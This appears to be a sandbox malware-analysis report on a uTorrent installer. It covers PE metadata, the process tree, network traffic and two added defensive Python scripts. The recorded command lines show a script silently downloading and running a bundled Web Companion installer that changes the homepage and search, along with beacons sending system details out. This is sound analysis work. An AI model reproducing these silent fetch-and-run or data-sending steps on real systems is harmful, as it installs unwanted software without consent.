download: | utorrent.45231.installer.exe |
Full analysis: | https://app.any.run/tasks/723ea532-2d31-4030-bf86-15dc71d1898b |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | May 24, 2019, 14:23:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed |
MD5: | 93BAF5FBCDF3B94E1084C0FAC6AEE7A0 |
SHA1: | 4D930FD21CC1E57F6E9EC9F65BF8CFE957D5635A |
SHA256: | 66C6FCE626A40C758F6AAF2282474A38E95327BDD09F0D95B55100C6E6F167E9 |
SSDEEP: | 24576:tHLR/jew2Xh6xHnTRS/c/hjscwnBoqbD0cFye5D2NuTlto4FdhnbABrqYC81z4:tFb2GY/c/hozbD0C5KNsnLFdkHC/ |
Extension | Type match (confidence %) |
---|---|
.exe | UPX compressed Win32 Executable (43.5) |
.exe | Win32 EXE Yoda's Crypter (42.7) |
.exe | Win32 Executable (generic) (7.2) |
.exe | Generic Win/DOS Executable (3.2) |
.exe | DOS Executable Generic (3.2) |
Field | Value |
---|---|
SpecialBuild: | stable34 stable |
ProductVersion: | 3.5.5.45231 |
ProductName: | µTorrent |
LegalCopyright: | ©2019 BitTorrent, Inc. All Rights Reserved. |
OriginalFileName: | uTorrent.exe |
InternalName: | uTorrent.exe |
FileVersion: | 3.5.5.45231 |
FileDescription: | µTorrent |
CompanyName: | BitTorrent Inc. |
CharacterSet: | Windows, Latin1 |
LanguageCode: | English (U.S.) |
FileSubtype: | - |
ObjectFileType: | Unknown |
FileOS: | Unknown (0) |
FileFlags: | Special build |
FileFlagsMask: | 0x002b |
ProductVersionNumber: | 3.5.5.45231 |
FileVersionNumber: | 3.5.5.45231 |
Subsystem: | Windows GUI |
SubsystemVersion: | 5.1 |
ImageVersion: | - |
OSVersion: | 5.1 |
EntryPoint: | 0x5002b0 |
UninitializedDataSize: | 3387392 |
InitializedDataSize: | 126976 |
CodeSize: | 1855488 |
LinkerVersion: | 14 |
PEType: | PE32 |
TimeStamp: | 2019:05:08 23:26:28+02:00 |
MachineType: | Intel 386 or later, and compatibles |
Field | Value |
---|---|
Architecture: | IMAGE_FILE_MACHINE_I386 |
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 08-May-2019 21:26:28 |
Detected languages: | |
CompanyName: | BitTorrent Inc. |
FileDescription: | µTorrent |
FileVersion: | 3.5.5.45231 |
InternalName: | uTorrent.exe |
OriginalFilename: | uTorrent.exe |
LegalCopyright: | ©2019 BitTorrent, Inc. All Rights Reserved. |
ProductName: | µTorrent |
ProductVersion: | 3.5.5.45231 |
SpecialBuild: | stable34 stable |
DOS header field | Value |
---|---|
Magic number: | MZ |
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000140 |
PE header field | Value |
---|---|
Signature: | PE |
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 08-May-2019 21:26:28 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: | |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
UPX0 | 0x00001000 | 0x0033B000 | 0x00000000 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0 |
UPX1 | 0x0033C000 | 0x001C5000 | 0x001C5000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.99987 |
.rsrc | 0x00501000 | 0x0001F000 | 0x0001EC00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.01891 |
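Added example (Python), not tooling from the sandbox or from BitTorrent: the three sections above, transcribed by hand, run through the Shannon-entropy computation behind the Entropy column and a small set of packed-PE triage heuristics (packer section names, an executable section with no raw bytes on disk, near-8.0 entropy in executable code, RWX sections). The section tuples, the 7.9 threshold and the packer-name list are this example's assumptions; the `IMAGE_SCN_` prefix is dropped from the flag names for brevity.

```python
import math
from collections import Counter

# Section table from the report above, transcribed by hand:
# (name, virtual size, raw size, characteristics without the IMAGE_SCN_ prefix, reported entropy).
REPORTED_SECTIONS = [
    ("UPX0", 0x0033B000, 0x00000000,
     {"CNT_UNINITIALIZED_DATA", "MEM_EXECUTE", "MEM_READ", "MEM_WRITE"}, 0.0),
    ("UPX1", 0x001C5000, 0x001C5000,
     {"CNT_INITIALIZED_DATA", "MEM_EXECUTE", "MEM_READ", "MEM_WRITE"}, 7.99987),
    (".rsrc", 0x0001F000, 0x0001EC00,
     {"CNT_INITIALIZED_DATA", "MEM_READ", "MEM_WRITE"}, 7.01891),
]

# Assumed list of section names that common packers leave behind (not exhaustive).
PACKER_SECTION_PREFIXES = ("UPX", ".aspack", ".adata", ".petite", ".vmp", ".themida")


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniformly
    distributed bytes. This is the statistic the Entropy column above reports per section."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def packing_indicators(sections, entropy_threshold: float = 7.9):
    """Packed-PE triage heuristics. Returns (section name, reason) pairs."""
    prefixes = tuple(p.upper() for p in PACKER_SECTION_PREFIXES)
    findings = []
    for name, vsize, rawsize, flags, entropy in sections:
        if name.upper().startswith(prefixes):
            findings.append((name, "section name associated with a known packer"))
        if rawsize == 0 and vsize > 0 and "MEM_EXECUTE" in flags:
            # Nothing on disk, yet executable at run time: the stub unpacks code into it.
            findings.append((name, f"executable section with 0 raw bytes but 0x{vsize:X} virtual bytes"))
        if "MEM_EXECUTE" in flags and entropy >= entropy_threshold:
            # Compressed or encrypted code sits close to 8.0; ordinary compiled code is usually below 7.
            findings.append((name, f"executable section entropy {entropy:.3f} >= {entropy_threshold}"))
        if {"MEM_EXECUTE", "MEM_WRITE"} <= flags:
            findings.append((name, "writable and executable (RWX)"))
    return findings


def is_likely_packed(sections, entropy_threshold: float = 7.9) -> bool:
    """True when some executable section is either empty on disk or near-maximum entropy."""
    return any(
        "MEM_EXECUTE" in flags and ((rawsize == 0 and vsize > 0) or entropy >= entropy_threshold)
        for _, vsize, rawsize, flags, entropy in sections
    )


if __name__ == "__main__":
    for section, reason in packing_indicators(REPORTED_SECTIONS):
        print(f"{section:6} {reason}")
    print("likely packed:", is_likely_packed(REPORTED_SECTIONS))
```

Both UPX sections trip three heuristics each (packer name, empty-on-disk or high entropy, RWX) while `.rsrc` trips none; on a real file, pass each section's raw bytes to `shannon_entropy` instead of the reported value.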
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.11079 | 1835 | UNKNOWN | Swedish - Sweden | RT_MANIFEST |
2 | 7.79992 | 1003 | UNKNOWN | Swedish - Sweden | RT_HTML |
3 | 5.79291 | 62 | UNKNOWN | Swedish - Sweden | RT_GROUP_ICON |
4 | 7.98271 | 9640 | UNKNOWN | English - United States | RT_ICON |
5 | 4.02193 | 20 | UNKNOWN | Swedish - Sweden | RT_GROUP_ICON |
6 | 7.98133 | 9640 | UNKNOWN | English - United States | RT_ICON |
7 | 7.98122 | 9640 | UNKNOWN | English - United States | RT_ICON |
8 | 7.97878 | 9640 | UNKNOWN | English - United States | RT_ICON |
9 | 7.98096 | 9640 | UNKNOWN | English - United States | RT_ICON |
10 | 6.4403 | 114 | UNKNOWN | Swedish - Sweden | RT_DIALOG |
Imported DLL |
---|
ADVAPI32.dll |
COMCTL32.dll |
COMDLG32.dll |
DNSAPI.dll |
GDI32.dll |
IPHLPAPI.DLL |
KERNEL32.DLL |
MSIMG32.dll |
OLEAUT32.dll |
PSAPI.DLL |
PID | CMD | Path | Indicators | Parent process | Process details |
---|---|---|---|---|---|
3632 | "C:\Users\admin\AppData\Local\Temp\utorrent.45231.installer.exe" | C:\Users\admin\AppData\Local\Temp\utorrent.45231.installer.exe | | explorer.exe | User: admin; Company: BitTorrent Inc.; Integrity Level: MEDIUM; Description: µTorrent; Exit code: 0; Version: 3.5.5.45231 |
2552 | "C:\Users\admin\AppData\Local\Temp\utorrent.45231.installer.exe" /HYDRA_PERMISSIONS_RESTART /HYDRA_LOG "C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\index.hta.log" /HYDRA_HTADIR "C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA" | C:\Users\admin\AppData\Local\Temp\utorrent.45231.installer.exe | | utorrent.45231.installer.exe | User: admin; Company: BitTorrent Inc.; Integrity Level: HIGH; Description: µTorrent; Exit code: 0; Version: 3.5.5.45231 |
2176 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA\index.hta?utorrent" "C:\Users\admin\AppData\Local\Temp\utorrent.45231.installer.exe" /LOG "C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\index.hta.log" /PID "2552" /CID "3vqe1CDNv2PqS7x0" /VERSION "111915183" /BUCKET "0" /SSB "4" /COUNTRY "US" /OS "6.1" /BROWSERS "\"C:\Program Files\Mozilla Firefox\firefox.exe\",\"C:\Program Files\Google\Chrome\Application\chrome.exe\",C:\Program Files\Internet Explorer\iexplore.exe,\"C:\Program Files\Opera\Opera.exe\"" /ARCHITECTURE "32" /LANG "en" /USERNAME "admin" /SID "S-1-5-21-1302019708-1500728564-335382590-1000" /CLIENT "utorrent" | C:\Windows\System32\mshta.exe | | utorrent.45231.installer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
1020 | "C:\Windows\System32\cscript.exe" "shell_scripts/check_if_cscript_is_working.js" | C:\Windows\System32\cscript.exe | — | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft ® Console Based Script Host; Exit code: 99; Version: 5.8.7600.16385 |
2156 | "C:\Windows\System32\PING.EXE" 8.8.8.8 -n 2 -w 500 | C:\Windows\System32\PING.EXE | — | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: TCP/IP Ping Command; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
4032 | "C:\Windows\System32\cscript.exe" shell_scripts/shell_ping_after_close.js "http://i-50.b-000.XYZ.bench.utorrent.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJodGFiZWdpbiIsInBpZCI6IjI1NTIiLCJoIjoiM3ZxZTFDRE52MlBxUzd4MCIsInYiOiIxMTE5MTUxODMiLCJiIjo0NTIzMSwiY2wiOiJ1VG9ycmVudCIsIm9zYSI6IjMyIiwic2xuZyI6ImVuIiwiZGIiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwiZGJ2IjoiOC4wIiwiaWJyIjpbeyJuYW1lIjoiRmlyZWZveCIsInZlcnNpb24iOiI2NS4wIiwiZXhlTmFtZSI6ImZpcmVmb3gifSx7Im5hbWUiOiJHb29nbGUgQ2hyb21lIiwidmVyc2lvbiI6IjczLjAiLCJleGVOYW1lIjoiY2hyb21lIn0seyJuYW1lIjoiV2luZG93cyBJbnRlcm5ldCBFeHBsb3JlciIsInZlcnNpb24iOiI4LjAiLCJleGVOYW1lIjoiaWV4cGxvcmUifSx7Im5hbWUiOiJPcGVyYSBJbnRlcm5ldCBCcm93c2VyIiwidmVyc2lvbiI6IjEyLjE1IiwiZXhlTmFtZSI6Im9wZXJhIn1dLCJpcCI6Ijg1LjIwMy4yMC4xMSIsImNuIjoiSXRhbHkiLCJwYWNraWQiOiJsYXZhc29mdF9iaW5nIn0=" | C:\Windows\System32\cscript.exe | | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft ® Console Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
2752 | "C:\Windows\System32\cscript.exe" shell_scripts/shell_ping_after_close.js "http://i-50.b-000.XYZ.bench.utorrent.com/e?i=50&e=…" | C:\Windows\System32\cscript.exe | | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft ® Console Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
2524 | "C:\Windows\System32\cscript.exe" shell_scripts/shell_ping_after_close.js "http://i-50.b-000.XYZ.bench.utorrent.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJvZmZlciIsInBpZCI6IjI1NTIiLCJoIjoiM3ZxZTFDRE52MlBxUzd4MCIsInYiOiIxMTE5MTUxODMiLCJiIjo0NTIzMSwiY2wiOiJ1VG9ycmVudCIsIm9zYSI6IjMyIiwic2xuZyI6ImVuIiwiZGIiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwiZGJ2IjoiOC4wIiwiaWJyIjpbeyJuYW1lIjoiRmlyZWZveCIsInZlcnNpb24iOiI2NS4wIiwiZXhlTmFtZSI6ImZpcmVmb3gifSx7Im5hbWUiOiJHb29nbGUgQ2hyb21lIiwidmVyc2lvbiI6IjczLjAiLCJleGVOYW1lIjoiY2hyb21lIn0seyJuYW1lIjoiV2luZG93cyBJbnRlcm5ldCBFeHBsb3JlciIsInZlcnNpb24iOiI4LjAiLCJleGVOYW1lIjoiaWV4cGxvcmUifSx7Im5hbWUiOiJPcGVyYSBJbnRlcm5ldCBCcm93c2VyIiwidmVyc2lvbiI6IjEyLjE1IiwiZXhlTmFtZSI6Im9wZXJhIn1dLCJpcCI6Ijg1LjIwMy4yMC4xMSIsImNuIjoiSXRhbHkiLCJvZmZlcnR5cGUiOiJwcmltYXJ5IiwicHJvdmlkZXIiOiJsYXZhc29mdF9iaW5nIiwib2ZmZXIiOiJsYXZhc29mdF9iaW5nIiwib2ZmZXJyZXN1bHQiOjF9" | C:\Windows\System32\cscript.exe | | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft ® Console Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
2068 | "C:\Windows\System32\cscript.exe" shell_scripts/shell_install_offer.js "C:/Users/admin/AppData/Local/Temp/HYD3A1F.tmp.1558707816/sideLog.log" "lavasoft_bing" "http://webcompanion.com/nano_download.php?partner=BT170902" "--silent%20--partner%3DBT170902%20--homepage%3D1%20--search%3D1" "0" "admin" "admin" | C:\Windows\System32\cscript.exe | | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft ® Console Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
3600 | "C:\Users\admin\AppData\Local\Temp\offer-DA1AEBF9-0C32-4EA8-8AA3-49915DD2A3B0.exe" --silent --partner=BT170902 --homepage=1 --search=1 | C:\Users\admin\AppData\Local\Temp\offer-DA1AEBF9-0C32-4EA8-8AA3-49915DD2A3B0.exe | | cscript.exe | User: admin; Company: Lavasoft; Integrity Level: HIGH; Description: Web Companion Installer; Version: 4.7.1987.3881 |
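Added example (Python), not code from the report, from BitTorrent or from ANY.RUN. It takes process records transcribed by hand from the table above (PIDs, parents, image names, and only the command lines the example actually parses; the rest are left empty), decodes the base64 `e=` payload that the HTA hands to cscript.exe for the `bench.utorrent.com` beacon, and follows the chain mshta.exe -> cscript.exe shell_install_offer.js -> offer-*.exe to recover the bundled download URL and confirm that the URL-encoded installer arguments passed to the script are the arguments the offer binary was launched with. The record field names and function names are this example's own.

```python
import base64
import json
import re
from urllib.parse import parse_qs, unquote, urlparse

# Process records constructed from the process table above (this example's own schema).
# Command lines the example does not parse are left empty.
PROCESSES = [
    {"pid": 3632, "ppid": None, "image": "utorrent.45231.installer.exe", "cmdline": ""},
    {"pid": 2552, "ppid": 3632, "image": "utorrent.45231.installer.exe", "cmdline": ""},
    {"pid": 2176, "ppid": 2552, "image": "mshta.exe", "cmdline": ""},
    {"pid": 4032, "ppid": 2176, "image": "cscript.exe",
     "cmdline": r'"C:\Windows\System32\cscript.exe" shell_scripts/shell_ping_after_close.js "http://i-50.b-000.XYZ.bench.utorrent.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJodGFiZWdpbiIsInBpZCI6IjI1NTIiLCJoIjoiM3ZxZTFDRE52MlBxUzd4MCIsInYiOiIxMTE5MTUxODMiLCJiIjo0NTIzMSwiY2wiOiJ1VG9ycmVudCIsIm9zYSI6IjMyIiwic2xuZyI6ImVuIiwiZGIiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwiZGJ2IjoiOC4wIiwiaWJyIjpbeyJuYW1lIjoiRmlyZWZveCIsInZlcnNpb24iOiI2NS4wIiwiZXhlTmFtZSI6ImZpcmVmb3gifSx7Im5hbWUiOiJHb29nbGUgQ2hyb21lIiwidmVyc2lvbiI6IjczLjAiLCJleGVOYW1lIjoiY2hyb21lIn0seyJuYW1lIjoiV2luZG93cyBJbnRlcm5ldCBFeHBsb3JlciIsInZlcnNpb24iOiI4LjAiLCJleGVOYW1lIjoiaWV4cGxvcmUifSx7Im5hbWUiOiJPcGVyYSBJbnRlcm5ldCBCcm93c2VyIiwidmVyc2lvbiI6IjEyLjE1IiwiZXhlTmFtZSI6Im9wZXJhIn1dLCJpcCI6Ijg1LjIwMy4yMC4xMSIsImNuIjoiSXRhbHkiLCJwYWNraWQiOiJsYXZhc29mdF9iaW5nIn0="'},
    {"pid": 2524, "ppid": 2176, "image": "cscript.exe",
     "cmdline": r'"C:\Windows\System32\cscript.exe" shell_scripts/shell_ping_after_close.js "http://i-50.b-000.XYZ.bench.utorrent.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJvZmZlciIsInBpZCI6IjI1NTIiLCJoIjoiM3ZxZTFDRE52MlBxUzd4MCIsInYiOiIxMTE5MTUxODMiLCJiIjo0NTIzMSwiY2wiOiJ1VG9ycmVudCIsIm9zYSI6IjMyIiwic2xuZyI6ImVuIiwiZGIiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwiZGJ2IjoiOC4wIiwiaWJyIjpbeyJuYW1lIjoiRmlyZWZveCIsInZlcnNpb24iOiI2NS4wIiwiZXhlTmFtZSI6ImZpcmVmb3gifSx7Im5hbWUiOiJHb29nbGUgQ2hyb21lIiwidmVyc2lvbiI6IjczLjAiLCJleGVOYW1lIjoiY2hyb21lIn0seyJuYW1lIjoiV2luZG93cyBJbnRlcm5ldCBFeHBsb3JlciIsInZlcnNpb24iOiI4LjAiLCJleGVOYW1lIjoiaWV4cGxvcmUifSx7Im5hbWUiOiJPcGVyYSBJbnRlcm5ldCBCcm93c2VyIiwidmVyc2lvbiI6IjEyLjE1IiwiZXhlTmFtZSI6Im9wZXJhIn1dLCJpcCI6Ijg1LjIwMy4yMC4xMSIsImNuIjoiSXRhbHkiLCJvZmZlcnR5cGUiOiJwcmltYXJ5IiwicHJvdmlkZXIiOiJsYXZhc29mdF9iaW5nIiwib2ZmZXIiOiJsYXZhc29mdF9iaW5nIiwib2ZmZXJyZXN1bHQiOjF9"'},
    {"pid": 2068, "ppid": 2176, "image": "cscript.exe",
     "cmdline": r'"C:\Windows\System32\cscript.exe" shell_scripts/shell_install_offer.js "C:/Users/admin/AppData/Local/Temp/HYD3A1F.tmp.1558707816/sideLog.log" "lavasoft_bing" "http://webcompanion.com/nano_download.php?partner=BT170902" "--silent%20--partner%3DBT170902%20--homepage%3D1%20--search%3D1" "0" "admin" "admin"'},
    {"pid": 3600, "ppid": 2068, "image": "offer-DA1AEBF9-0C32-4EA8-8AA3-49915DD2A3B0.exe",
     "cmdline": r'"C:\Users\admin\AppData\Local\Temp\offer-DA1AEBF9-0C32-4EA8-8AA3-49915DD2A3B0.exe" --silent --partner=BT170902 --homepage=1 --search=1'},
]


def split_cmdline(cmd: str) -> list:
    """Minimal Windows-style tokenizer: one argument per double-quoted run or bare word."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def decode_bench_event(url: str) -> dict:
    """Decode the e= parameter of a bench.utorrent.com beacon: base64 of a JSON object."""
    raw = parse_qs(urlparse(url).query)["e"][0]
    raw = raw.replace(" ", "+")        # parse_qs turns a literal '+' into a space
    raw += "=" * (-len(raw) % 4)       # tolerate stripped padding
    return json.loads(base64.b64decode(raw))


def bench_events(processes) -> list:
    """(pid, action, decoded event) for every beacon URL passed to cscript.exe."""
    events = []
    for p in processes:
        for url in re.findall(r'"(https?://[^"]*\.bench\.utorrent\.com/e\?[^"]*)"', p["cmdline"]):
            event = decode_bench_event(url)
            events.append((p["pid"], event.get("action"), event))
    return events


def offer_chain(processes) -> list:
    """Reconstruct mshta -> cscript shell_install_offer.js -> offer-*.exe and the bundled download."""
    by_pid = {p["pid"]: p for p in processes}
    chains = []
    for p in processes:
        if p["image"].lower() != "cscript.exe" or "shell_install_offer.js" not in p["cmdline"]:
            continue
        argv = split_cmdline(p["cmdline"])
        # argv: cscript, script, side log, offer id, download URL, URL-encoded installer args, ...
        installer_args = unquote(argv[5])
        children = [c for c in processes if c["ppid"] == p["pid"]]
        chains.append({
            "script_host_parent": by_pid[p["ppid"]]["image"] if p["ppid"] in by_pid else None,
            "offer": argv[3],
            "download_url": argv[4],
            "installer_args": installer_args,
            "launched": [c["image"] for c in children],
            # True when a child really ran with the arguments the script was handed.
            "args_match": any(" ".join(split_cmdline(c["cmdline"])[1:]) == installer_args
                              for c in children),
        })
    return chains


if __name__ == "__main__":
    for pid, action, event in bench_events(PROCESSES):
        print(pid, action, {k: event[k] for k in ("packid", "ip", "cn") if k in event})
    print(json.dumps(offer_chain(PROCESSES), indent=2))
```

The decoded beacons show what the installer reports before any offer is shown (installed browsers with versions, the egress IP and country from the ip-api.com lookup, and the pre-selected `packid`), and the chain confirms that the `--silent --partner=BT170902 --homepage=1 --search=1` string carried through the HTA is exactly what the Web Companion installer ran with.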
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\utt38F5.tmp | — | — | — |
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Roaming\uTorrent\settings.dat.new | — | — | — |
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | 354ED1BE88B782FC192F27E695921A2A | D60199E98844AD53BADAAB84ED033FFBC40AFBA1F2967E973C32829D0AB7EC99 |
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@localhost[1].txt | text | 2349784957088622B3E58E227F710431 | 68765A98C2DA4BE53D9597B271F7BA221CDA2553CB2CCFD728ECCCC087F4FF8D |
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Roaming\uTorrent\settings.dat | binary | BEBFFCACBBB56CD62966F3EF425E1747 | 3981F0088321E63EC910816A04D04B920519EBAFA9BFB7EB726A3094B5E95FA4 |
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA\i18n\it.json | html | 985938F0DF5251B549A1B99DBAC1F69C | ACA4F9BF79A3F84AE6A9D36680DF5D182AC93B1AA649775E1618B49FBD22A34B |
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\index.hta.log | text | 2B632A88AF93F552846FDBF6890E8613 | 2B1D8F74B6B7EF3811B62E9320953577A736ED64AB9DD5C3E2390D994A10D234 |
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA\images\bt_icon_48px.png | image | 6B6BD42C4A13B48F45A9F278B23D6B2B | 7C5123103DC089C1912B1EAE0BBBE2B7C32E39ECF83649A53A8E9F3AEA960602 |
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA\i18n\pt.json | html | FB63D52AC25CD3D272365FA75F74C279 | E39D6A57D2F16E60C4075D07741DADD6A2742A85ACEB250083D7AB103279F737 |
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA\i18n\ru.json | html | 4F268BCA1F6AF01246F257A141CEC972 | 28B880822283482194EA9B4B94552A94E35F659CF026F592173ED46FCF3A91F4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3632 | utorrent.45231.installer.exe | GET | 200 | 67.215.238.66:80 | http://download-lb.utorrent.com/endpoint/hydra-ut/os/win7/track/stable/browser/ie/os-region/US/os-lang/en/os-ver/6.1/enc-ver/111915183/ | US | compressed | 761 Kb | whitelisted |
2752 | cscript.exe | GET | 200 | 54.235.208.27:80 | http://i-50.b-000.xyz.bench.utorrent.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJodGFTdWNjZXNzIiwicGlkIjoiMjU1MiIsImgiOiIzdnFlMUNETnYyUHFTN3gwIiwidiI6IjExMTkxNTE4MyIsImIiOjQ1MjMxLCJjbCI6InVUb3JyZW50Iiwib3NhIjoiMzIiLCJzbG5nIjoiZW4iLCJkYiI6IldpbmRvd3MgSW50ZXJuZXQgRXhwbG9yZXIiLCJkYnYiOiI4LjAiLCJpYnIiOlt7Im5hbWUiOiJGaXJlZm94IiwidmVyc2lvbiI6IjY1LjAiLCJleGVOYW1lIjoiZmlyZWZveCJ9LHsibmFtZSI6Ikdvb2dsZSBDaHJvbWUiLCJ2ZXJzaW9uIjoiNzMuMCIsImV4ZU5hbWUiOiJjaHJvbWUifSx7Im5hbWUiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwidmVyc2lvbiI6IjguMCIsImV4ZU5hbWUiOiJpZXhwbG9yZSJ9LHsibmFtZSI6Ik9wZXJhIEludGVybmV0IEJyb3dzZXIiLCJ2ZXJzaW9uIjoiMTIuMTUiLCJleGVOYW1lIjoib3BlcmEifV0sImlwIjoiODUuMjAzLjIwLjExIiwiY24iOiJJdGFseSIsInBhY2tpZCI6ImxhdmFzb2Z0X2JpbmcifQ== | US | text | 21 b | whitelisted |
2552 | utorrent.45231.installer.exe | GET | — | 98.143.146.7:80 | http://utorrent.com/download/langpacks/dl.php?build=45231&ref=client&client=utorrent&sys_l=en&sel_l=-1&tk=stable34 | US | — | — | whitelisted |
2556 | uTorrent.exe | GET | — | 173.254.195.58:80 | http://update.bittorrent.com/time.php | US | — | — | whitelisted |
3632 | utorrent.45231.installer.exe | POST | — | 54.225.194.96:80 | http://i-50.b-000.xyz.bench.utorrent.com/e?i=50 | US | — | — | whitelisted |
2068 | cscript.exe | GET | 200 | 104.17.178.102:80 | http://webcompanion.com/nano_download.php?partner=BT170902 | US | executable | 347 Kb | malicious |
3632 | utorrent.45231.installer.exe | POST | 200 | 54.225.194.96:80 | http://i-50.b-000.xyz.bench.utorrent.com/e?i=50 | US | text | 21 b | whitelisted |
2176 | mshta.exe | GET | 200 | 185.194.141.58:80 | http://ip-api.com/json?callback=jQuery191038992254780308044_1558707820092&_=1558707820093 | DE | text | 329 b | shared |
2552 | utorrent.45231.installer.exe | POST | 200 | 54.235.208.27:80 | http://i-50.b-000.xyz.bench.utorrent.com/e?i=50 | US | text | 21 b | whitelisted |
2556 | uTorrent.exe | GET | 200 | 87.248.202.1:80 | http://cdn.ap.bittorrent.com/control/tags/ut.json | IT | text | 8.72 Kb | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3632 | utorrent.45231.installer.exe | 54.225.194.96:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
2176 | mshta.exe | 185.194.141.58:80 | ip-api.com | netcup GmbH | DE | unknown |
3632 | utorrent.45231.installer.exe | 67.215.238.66:80 | download-lb.utorrent.com | QuadraNet, Inc | US | suspicious |
2552 | utorrent.45231.installer.exe | 54.235.208.27:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
2752 | cscript.exe | 54.235.208.27:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
2552 | utorrent.45231.installer.exe | 54.225.194.96:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
4032 | cscript.exe | 54.225.194.96:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
